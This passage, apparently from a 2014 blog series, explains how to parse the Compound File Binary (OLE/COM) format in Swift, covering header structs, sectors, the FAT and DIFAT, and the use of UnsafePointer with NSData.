                         SectorSource) -> FileAllocationTable?
    {
        if let sequence = fat.sequence(header.firstMiniFATSector)
        {
            return
                readFAT(
                        header.nMiniFATSectors,
                    nEntriesPerSector:
                        nEntriesPerSector,
                    sequence:
                        sequence,
                    sectors:
                        sectors)
        }
        else
        {
            return nil
        }
    }

November 17, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Four — Where Is Everything ? Sectors Edition

Conceptually a compound file is a collection of

  • storage objects, and

  • stream objects

arranged in a ‘tree’, plus internal streams which hold metadata.

A storage object is a named collection of stream objects and storage objects.

A stream object is a named sequence of bytes.

A compound file is considered to be a single storage object, the ‘root storage’ object, containing other storage objects and stream objects.

A storage object is a purely logical collection.

Unlike stream objects, storage objects do not exist as separate entities. For example, the stream objects ‘contained’ within a single storage object are not grouped together in the file.

At the lowest level a compound file comprises a header and some number of fixed-length sectors.

Sectors are used to store the contents of stream objects and internal streams.

If a stream object or internal stream spans multiple sectors then those sectors may appear anywhere in the file in any order.

To access the contents of a stream object or internal stream it is necessary to know which sector contains the first part and which sectors contain the other parts and in what order.

Given the name of a stream object the starting sector can be determined using ‘the directory’ which is an internal stream.

Given the index of the sector which contains part of a stream object the index of the sector which contains the next part, if any, can be determined using the ‘file allocation table’ (FAT) which is another internal stream.

To access the contents of a given named stream object therefore it is first necessary to read the directory.

The directory is stored in one or more sectors so to read it, it is first necessary to have read the file allocation table to determine their whereabouts.

The file allocation table is also stored in one or more sectors. Fortunately we don’t have to have already read it in order to read it, because the sectors which comprise the file allocation table are specified by the ‘double-indirect file allocation table’ (DIFAT) which is another internal stream.

The first sector of the DIFAT is specified in the header and, unlike all other sectors in a compound file, the DIFAT sectors are chained together using information in the sectors themselves, not the FAT.

In addition the first 109 entries of the DIFAT are stored in the header itself as the DIFAT field, which means that for a file with no more than 109 FAT sectors it is not necessary to read any DIFAT sectors at all.

To read the file allocation table we must iterate over the entries in the DIFAT reading each of the specified sectors and concatenating the contents.
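
The iterate-and-concatenate step can be sketched as follows in present-day Swift. This is not the code used in these posts: sectors are supplied by a closure instead of a SectorSource, the FAT is returned as a plain array, and all of the names are made up. It assumes unused DIFAT entries hold the FREESECT value 0xFFFFFFFF, as the specification describes.

```swift
// Hypothetical sketch: a closure stands in for the sector source.
let freeSector: UInt32 = 0xFFFFFFFF   // FREESECT, marks an unused DIFAT entry

/// Decodes the bytes of one sector as little-endian 32-bit entries.
func entries(in sector: [UInt8]) -> [UInt32] {
    var result: [UInt32] = []
    var i = 0
    while i + 4 <= sector.count {
        let b0 = UInt32(sector[i])
        let b1 = UInt32(sector[i + 1]) << 8
        let b2 = UInt32(sector[i + 2]) << 16
        let b3 = UInt32(sector[i + 3]) << 24
        result.append(b0 | b1 | b2 | b3)
        i += 4
    }
    return result
}

/// Reads each FAT sector listed in the DIFAT and concatenates the entries.
/// Returns nil if any listed sector cannot be read.
func readWholeFAT(difat: [UInt32], sector: (UInt32) -> [UInt8]?) -> [UInt32]? {
    var fat: [UInt32] = []
    for index in difat {
        if index == freeSector { break }              // no more FAT sectors
        guard let bytes = sector(index) else { return nil }
        fat += entries(in: bytes)
    }
    return fat
}

// Two tiny pretend 'sectors' of eight bytes each, keyed by sector index.
let fakeSectors: [UInt32: [UInt8]] = [
    5: [1, 0, 0, 0, 2, 0, 0, 0],
    7: [0xFE, 0xFF, 0xFF, 0xFF, 3, 0, 0, 0]
]
let wholeFAT = readWholeFAT(difat: [5, 7, freeSector]) { fakeSectors[$0] }
```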

From this point on everything has to be accessed in terms of sectors so we can start by defining the SectorSource protocol.

    protocol SectorSource
    {
        var sectorSize : Int { get }
    
        func sector(index:SectorIndex) -> UnsafePointer<UInt8>?
    }

A SectorSource is an object capable of returning a sector given its index.

The SectorIndex type is defined like this

    typealias SectorIndex   = UInt32

The sectorSize property specifies the size of all sectors returned by a successful call to the sector method.
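
To make the idea concrete, here is one possible in-memory implementation, sketched in present-day Swift. It uses a hypothetical variant of the protocol that hands back an array slice rather than a raw pointer, and it assumes the header occupies the space of one sector before sector 0. Neither the variant protocol nor the struct appears in the original code.

```swift
typealias SectorIndex = UInt32

// Hypothetical variant of SectorSource returning a slice instead of a pointer.
protocol SliceSectorSource {
    var sectorSize: Int { get }

    func sector(_ index: SectorIndex) -> ArraySlice<UInt8>?
}

// Serves sectors from the bytes of a whole file held in memory.
struct InMemorySectorSource: SliceSectorSource {
    let fileBytes: [UInt8]
    let sectorSize: Int

    func sector(_ index: SectorIndex) -> ArraySlice<UInt8>? {
        // Sector 0 starts one sector's worth of bytes into the file.
        let start = (Int(index) + 1) * sectorSize
        let end   = start + sectorSize

        // Refuse to return a sector that runs off the end of the file.
        guard end <= fileBytes.count else { return nil }

        return fileBytes[start ..< end]
    }
}

// A pretend file with a four byte 'header' and two four byte 'sectors'.
let source = InMemorySectorSource(
    fileBytes: [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2],
    sectorSize: 4)
let secondSector = Array(source.sector(1) ?? [])
```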

Given a SectorSource object for the sectors in the file and the sequence of sector indexes from the DIFAT we can read the FAT like this

    private func readFAT(
                     nSectors:
                         Int,
                     nEntriesPerSector:
                         Int,
                     sequence:
                         SectorIndexSequence,
                     sectors:
                         SectorSource) -> FileAllocationTable?
    {
        if nSectors == 1
        {
            var g = sequence.generate()
    
            if let sectorIndex = g.next()
            {
                return readSingleSectorFAT(sectorIndex, nEntries:nEntriesPerSector, sectors: sectors)
            }
            else
            {
                return nil
            }
        }
        else
        {
            return nil
        }
    }

It is especially easy in the case of this particular file since the entire FAT is contained in a single sector, which is the only case the readFAT function above handles.

    private func readSingleSectorFAT(index:SectorIndex, nEntries:Int, sectors:SectorSource) -> FileAllocationTable?
    {
        if let sector = sectors.sector(index)
        {
            return SingleSectorFAT(bytes:sector, nEntries:nEntries)
        }
        else
        {
            return nil
        }
    }

The result is an object which implements the FileAllocationTable protocol.

    protocol FileAllocationTable
    {
        func next(index: SectorIndex) -> SectorIndex?
        
        func sequence(index:SectorIndex) -> SectorIndexSequence?
    }

Given a sector index the next method returns the index of the next sector as held in the file allocation table.

Given the index of the first sector of a stream object the sequence method will return the indices of all the sectors containing the stream object in order.

The SectorIndexSequence type is defined like this

    typealias SectorIndexSequence = SequenceOf<SectorIndex>
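
How the sequence method might walk the table can be sketched like this, in present-day Swift and with the FAT held as a plain array. The function name is made up, and the sketch assumes the end of a chain is marked by the ENDOFCHAIN value 0xFFFFFFFE, as the specification describes. It is an illustration of the idea rather than the implementation behind the protocol above.

```swift
let endOfChain: UInt32 = 0xFFFFFFFE   // ENDOFCHAIN

/// Follows the chain starting at `first`, returning the sector indices in order.
/// Returns nil if the chain leaves the table or loops back on itself.
func chain(from first: UInt32, in fat: [UInt32]) -> [UInt32]? {
    var result: [UInt32] = []
    var current = first

    while current != endOfChain {
        // A valid chain never indexes outside the table, and can never
        // contain more sectors than the table has entries.
        guard Int(current) < fat.count, result.count < fat.count else {
            return nil
        }
        result.append(current)
        current = fat[Int(current)]
    }
    return result
}

// Entry 1 points at 3, entry 3 points at 2, and entry 2 ends the chain.
let table: [UInt32] = [0xFFFFFFFF, 3, endOfChain, 2]
let sectorsOfStream = chain(from: 1, in: table)
```

The length check doubles as a cheap guard against a corrupt table whose entries form a cycle.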

November 16, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Three — Now Read Your Header

The 512 byte header of a compound file can be represented as a Swift struct like this

    struct FlatFileHeader
    {
        let signature               : EightBytes
        let clsid                   : CLSID
        //
        let minor                   : UInt16
        let major                   : UInt16
        let byteOrder               : UInt16
        let sectorShift             : UInt16
        let miniSectorShift         : UInt16
        let reserved                : SixBytes
        let nDirSectors             : UInt32
        let nFATSectors             : UInt32
        let firstDirSector          : UInt32
        let xactionSig              : UInt32
        let miniStreamCutoffSize    : UInt32
        let firstMiniFATSector      : UInt32
        let nMiniFATSectors         : UInt32
        let firstDIFATSector        : UInt32
        let nDIFATSectors           : UInt32
        let difat                   : DIFAT
    }

It is effectively a straight transcription from the specification with four exceptions.

In the specification the first field is defined as

    Header Signature (8 bytes): ... 

the second field is defined as

    Header CLSID (16 bytes): ... 

the eighth field is defined as

    Reserved (6 bytes): ... 

and the last field is defined as

    DIFAT (436 bytes): ... 

In all these cases the field could be represented as

    [UInt8]

but that fails to capture the exact size of each field, so we do this instead.

We represent the ‘Header Signature’ using the struct EightBytes which looks something like this

    struct EightBytes
    {
        let b0 : UInt8
        let b1 : UInt8
        let b2 : UInt8
        let b3 : UInt8
        let b4 : UInt8
        let b5 : UInt8
        let b6 : UInt8
        let b7 : UInt8
    }
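
The code that prints the signature further on indexes it with a subscript, which the struct as shown does not define. One way the missing piece might look, written in present-day Swift, is sketched below. This is a guess at the shape of it, not the code actually used.

```swift
struct EightBytes {
    let b0, b1, b2, b3, b4, b5, b6, b7: UInt8

    // Hypothetical subscript giving array-like read access to the eight fields.
    subscript(index: Int) -> UInt8 {
        switch index {
        case 0: return b0
        case 1: return b1
        case 2: return b2
        case 3: return b3
        case 4: return b4
        case 5: return b5
        case 6: return b6
        case 7: return b7
        default: preconditionFailure("EightBytes index out of range")
        }
    }
}

// The signature bytes given in the specification.
let signature = EightBytes(
    b0: 0xD0, b1: 0xCF, b2: 0x11, b3: 0xE0,
    b4: 0xA1, b5: 0xB1, b6: 0x1A, b7: 0xE1)
let asArray = (0 ..< 8).map { signature[$0] }
```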

We represent the ‘Header CLSID’ using the struct CLSID which looks something like this

    struct CLSID
    {
        let first   : EightBytes
        let second  : EightBytes
    }

We represent the ‘Reserved’ field using the struct SixBytes which looks something like this

    struct SixBytes
    {
        let b0 : UInt8
        let b1 : UInt8
        let b2 : UInt8
        let b3 : UInt8
        let b4 : UInt8
        let b5 : UInt8
    }

The DIFAT field is not really 436 bytes but 109 32-bit integers which we can represent using the struct DIFAT which looks something like this

    struct DIFAT
    {
        let i0  : UInt32
        let i1  : UInt32
    }

At the moment it only represents the first two values but it can be ‘extended’ if necessary.

The result of using this seemingly random combination of rather odd structures is that the struct FlatFileHeader is indeed ‘flat’, which is to say that all its fields are value types. They are in fact all structs.

Bearing in mind that the compound file format is little endian and so is this computer, and if we assume the Swift compiler

  1. represents the values of the UInt<N> types by the exact number of bytes necessary when the value is contained in a struct,

  2. represents the fields in exactly the same order that they were defined and without padding,

  3. does the same recursively with the nested struct values, and

  4. ensures that the memory allocated for the struct at runtime is at least 4 byte aligned

then, not at all accidentally, the representation of the struct in memory would be identical to the representation of the header in the compound file, and vice-versa.
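
These assumptions can at least be probed rather than taken on trust. The sketch below uses MemoryLayout from present-day Swift, which is not what was available when this was written, on a cut-down stand-in for the start of the header. The struct names are made up. As far as I know the language makes no formal promise about the layout of native structs, so a check like this shows what a particular compiler does, not what it must do.

```swift
// Hypothetical cut-down stand-ins for the header structures.
struct Bytes8 { let b0, b1, b2, b3, b4, b5, b6, b7: UInt8 }
struct Bytes6 { let b0, b1, b2, b3, b4, b5: UInt8 }

struct HeaderStart {
    let signature   : Bytes8
    let clsidFirst  : Bytes8
    let clsidSecond : Bytes8
    let minor, major, byteOrder, sectorShift, miniSectorShift : UInt16
    let reserved    : Bytes6
    let nDirSectors : UInt32
    let nFATSectors : UInt32
}

// In the file the fields before nDirSectors occupy 8 + 16 + 10 + 6 = 40 bytes,
// so nDirSectors should sit at offset 40 and the whole prefix should be 48 bytes.
let sixSize        = MemoryLayout<Bytes6>.size
let prefixSize     = MemoryLayout<HeaderStart>.size
let prefixAlign    = MemoryLayout<HeaderStart>.alignment
let dirCountOffset = MemoryLayout<HeaderStart>.offset(of: \HeaderStart.nDirSectors)
```

If the values do not match the arithmetic in the comment then reading the header by reinterpreting the bytes is not safe with that compiler.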

It is the vice-versa case which is of interest since it would imply that if we had an NSData object containing at least the first 512 bytes of a compound file then we could ‘read’ the header like this

    let flatHeader = UnsafePointer<FlatFileHeader>(data.bytes).memory

This is not necessarily the piece of insane optimism that it might at first appear.

Given the seamless interworking between Swift and Objective-C it would make a great deal of sense if at runtime a Swift struct meeting the right criteria was identical to the equivalent Objective-C struct.

Running this

    ...
    
    let data = NSData(contentsOfFile:fileName)
    
    if data == nil
    {
        return
    }
    
    let nBytes = data!.length
    
    if nBytes < CFBFFormat.HEADER_SIZE
    {
        return
    }
        
    let flatHeader = UnsafePointer<FlatFileHeader>(data!.bytes).memory
            
    print("Signature:\t\t\t")
    for i in 0 ..< 8
    {
        print("\(flatHeader.signature[i]) ")
    }
    println()
    println("Major:\t\t\t\t\(flatHeader.major)")
    println("Minor:\t\t\t\t\(flatHeader.minor)")
    println("Byte order:\t\t\t\(flatHeader.byteOrder)")
    println("Sector shift:\t\t\(flatHeader.sectorShift)")
    println("MiniSector shift:\t\(flatHeader.miniSectorShift)")
    println("N dir sectors:\t\t\(flatHeader.nDirSectors)")
    println("N FAT sectors:\t\t\(flatHeader.nFATSectors)")
    println()
            
    ...

prints this

    Signature:          208 207 17 224 161 177 26 225
    Major:              3
    Minor:              62
    Byte order:         65534
    Sector shift:       9
    MiniSector shift:   6
    N dir sectors:      0
    N FAT sectors:      1

The specification gives the signature bytes as

    0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1

so we appear to have ‘read’ the header successfully.

We can make some additional checks on the fields with predefined values.

The major version is 3, in which case the specification says the minor version should be 0x003E, which it is.

The byte order should be 0xFFFE, which it is.

The sector shift is correct, as is the minisector shift.

The number of directory sectors in a version 3 file is always 0, and it is.
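
For comparison, the same checks can be made without relying on struct layout at all, by decoding the fields from their byte offsets. The sketch below is in present-day Swift, works on a plain byte array, and uses made-up function names. The offsets are the ones implied by the field sizes in the struct above: 8 bytes of signature and 16 of CLSID put the minor version at offset 24.

```swift
/// Decodes a little-endian 16-bit value at the given offset.
func u16(_ bytes: [UInt8], at offset: Int) -> UInt16 {
    let low  = UInt16(bytes[offset])
    let high = UInt16(bytes[offset + 1])
    return low | (high << 8)
}

let expectedSignature: [UInt8] = [0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1]

/// Hypothetical check of the fields with predefined values in a version 3 header.
func looksLikeVersion3Header(_ bytes: [UInt8]) -> Bool {
    guard bytes.count >= 512 else { return false }
    guard Array(bytes[0 ..< 8]) == expectedSignature else { return false }
    guard u16(bytes, at: 24) == 0x003E else { return false }   // minor version
    guard u16(bytes, at: 26) == 3 else { return false }        // major version
    guard u16(bytes, at: 28) == 0xFFFE else { return false }   // byte order
    guard u16(bytes, at: 30) == 9 else { return false }        // sector shift
    guard u16(bytes, at: 32) == 6 else { return false }        // mini sector shift
    // Number of directory sectors, four bytes at offset 40, must be zero.
    return bytes[40 ..< 44].allSatisfy { $0 == 0 }
}

// Build a pretend header containing just the fields being checked.
var sample = [UInt8](repeating: 0, count: 512)
sample.replaceSubrange(0 ..< 8, with: expectedSignature)
sample[24] = 0x3E
sample[26] = 3
sample[28] = 0xFE
sample[29] = 0xFF
sample[30] = 9
sample[32] = 6
let sampleIsValid = looksLikeVersion3Header(sample)
```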

All done with nary a getUInt16 or a getUInt32 in sight.


November 15, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Two — Of Bytes And Pointers To Bytes

Whether we choose to access the contents of a file as a whole or in part, we will end up with an NSData object with some bytes in it, so how do you get at the bytes ?

As before the answer is, in exactly the same way as you do in Objective-C.

So that would be like this then ?

    let bytes = data.bytes

It would.

The similarities between doing things in Swift and Objective-C extend to the type of the property bytes.

In Objective-C it is declared like this

    @property(readonly) const void *bytes

and in Swift like this

    var bytes: UnsafePointer<Void> { get }

So what we have got hold of is something with the type

    UnsafePointer<Void>

which is the equivalent of

    const void*

and it is about as useful, which is to say, not very.

If we do this

    let b = bytes[0]

then the compiler will helpfully volunteer the warning

    Constant 'b' inferred to have type 'Void' which may be unexpected

Possibly not unexpected, it is an ‘unsafe pointer’ to ‘Void’ after all, but definitely of limited utility.

An empty tuple, for that is what a ‘Void’ is of course, specialises in representing nothing, a job at which it excels, but it makes for a very unconvincing byte.

What we want is a

    UnsafePointer<UInt8>

in the same way that we would want a

    const uint8_t*

or something in Objective-C.

In Objective-C you do this to get one

    const uint8_t* bytes = (const uint8_t*)data.bytes;

and in Swift you do this

    let bytes = UnsafePointer<UInt8>(data.bytes)

Once you have one, you can access the byte to which it ‘points’ directly

    let b = bytes.memory

or by using a subscript

    let c = bytes[1]
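
The spelling has changed since this was written. From Swift 3 onwards the memory property is called pointee, and the usual way to borrow a typed pointer is through a closure. The following is a rough present-day equivalent of the two accesses above, using a plain byte array in place of an NSData object so that it stands alone. The variable names are made up.

```swift
let storage: [UInt8] = [0xD0, 0xCF, 0x11, 0xE0]

// The pointer is only valid inside the closure, so copy out what is needed.
let (first, second) = storage.withUnsafeBufferPointer { buffer -> (UInt8, UInt8) in
    // baseAddress is nil only for an empty buffer.
    guard let bytes = buffer.baseAddress, buffer.count >= 2 else {
        return (0, 0)
    }
    // bytes is an UnsafePointer<UInt8>, just as before.
    return (bytes.pointee, bytes[1])
}
```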

Also, just as you can in Objective-C, you can ‘walk’ right off the end of the associated memory because it really is an ‘unsafe’ pointer.

    ...
    
    let data  = NSData()
    let bytes = UnsafePointer<UInt8>(data.bytes)
    
    for i in 0 ..< 16
    {
        println(bytes[i])
    }

    ...

at which point everything may come to a grinding halt, but then again it may not, it all depends.

The other way to get at the bytes in an NSData object is, needless to say, exactly the same as the other way you would do it in Objective-C, viz.

    let length = data.length
    let bytes  = UnsafeMutablePointer<UInt8>.alloc(length)

    data.getBytes(bytes, length:length)

If you are not happy walking off the end of other people’s memory and prefer walking off the end of your own, this is the option for you.

The memory returned by the call to alloc is not managed and must be explicitly freed by a call to dealloc.

    bytes.dealloc(length)

The allocated memory is also not initialized to anything in particular and especially not to zero.
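
In present-day Swift the same dance is spelt allocate, initialize and deallocate. The sketch below wraps it in a made-up function so that the memory is always freed, and zeroes the memory explicitly because nothing else will.

```swift
/// Hypothetical helper: allocates, zeroes, pokes and copies out a buffer.
func scratchBuffer(length: Int) -> [UInt8] {
    precondition(length > 0, "length must be positive")

    let bytes = UnsafeMutablePointer<UInt8>.allocate(capacity: length)

    // The memory is not managed, so make sure it is freed on every path out.
    defer { bytes.deallocate() }

    // Freshly allocated memory holds nothing in particular, so zero it.
    bytes.initialize(repeating: 0, count: length)

    // Modify a byte through the mutable pointer using a subscript.
    bytes[length / 2] = UInt8(truncatingIfNeeded: length)

    // Copy the contents into an array before the memory is freed.
    return Array(UnsafeBufferPointer(start: bytes, count: length))
}

let scratch = scratchBuffer(length: 16)
```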

In Swift an

    UnsafeMutablePointer<T>

is to an

    UnsafePointer<T>

as, in Objective-C,

    T*

is to

    const T*

so you can modify the memory an UnsafeMutablePointer<T> ‘points at’ directly

    bytes.memory = UInt8(length)

or using a subscript

    bytes[8] = UInt8(length)

As well as the subscript functions, the UnsafePointer<T> and UnsafeMutablePointer<T> types support a variety of operators.

For example

    let bytes  = UnsafeMutablePointer<UInt8>.alloc(16)
    
    for i in 0 ..< 16
    {
        bytes[i] = UInt8(i)
    }
        
    var p = bytes
        
    for i in 0 ..< 8
    {
        println(p.memory)
        p += 2
    }
        
    let end = bytes + 8
        
    p = bytes
        
    while p < end
    {
        println(p++.memory)
    }
        
    p = bytes + 7
        
    while p >= bytes
    {
        println(p--.memory)
    }

The ‘mutating’ operators pre/post decrement/increment etc. can only be used if the ‘pointer’ is referenced from a mutable variable.
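
The ++ and -- operators were removed from the language in Swift 3, so in present-day Swift the same walks have to be written with += and -=. A sketch, with made-up function names, which collects the values instead of printing them:

```swift
/// Walks forwards through the bytes two at a time.
func everyOther(_ values: [UInt8]) -> [UInt8] {
    return values.withUnsafeBufferPointer { buffer -> [UInt8] in
        guard let start = buffer.baseAddress else { return [] }

        let end    = start + buffer.count
        var p      = start
        var result: [UInt8] = []

        while p < end {
            result.append(p.pointee)
            // Never step further than the one-past-the-end position.
            p += min(2, end - p)
        }
        return result
    }
}

/// Walks backwards from the end to the start.
func backwards(_ values: [UInt8]) -> [UInt8] {
    return values.withUnsafeBufferPointer { buffer -> [UInt8] in
        guard let start = buffer.baseAddress else { return [] }

        var p      = start + buffer.count
        var result: [UInt8] = []

        while p > start {
            p -= 1                      // step back first, then read
            result.append(p.pointee)
        }
        return result
    }
}

let evens    = everyOther([0, 1, 2, 3, 4])
let reversed = backwards([1, 2, 3])
```

Stepping back before reading means the pointer never ends up in front of the start of the memory, which the post-decrement version above does on its last iteration.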

You can create an UnsafePointer<T> from an UnsafeMutablePointer<T>

    let bytes     = UnsafeMutablePointer<UInt8>.alloc(16)
    let immutable = UnsafePointer<UInt8>(bytes)

and even vice-versa

    let mutable   = UnsafeMutablePointer<UInt8>(data.bytes)

which is a bit worrying but then the clue is in the name. UnsafePointer<T>s and UnsafeMutablePointer<T>s are ‘unsafe’.

